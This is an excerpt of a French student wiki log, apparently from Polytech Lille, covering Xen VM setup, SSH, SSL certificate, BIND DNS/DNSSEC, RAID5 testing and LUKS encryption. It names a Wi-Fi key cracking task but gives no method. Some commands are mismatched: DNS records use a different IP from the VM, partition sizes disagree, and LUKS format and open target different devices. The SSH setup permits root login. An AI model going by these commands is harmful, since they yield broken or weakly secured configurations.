La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46341</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46341"/>
				<updated>2017-11-17T13:35:39Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
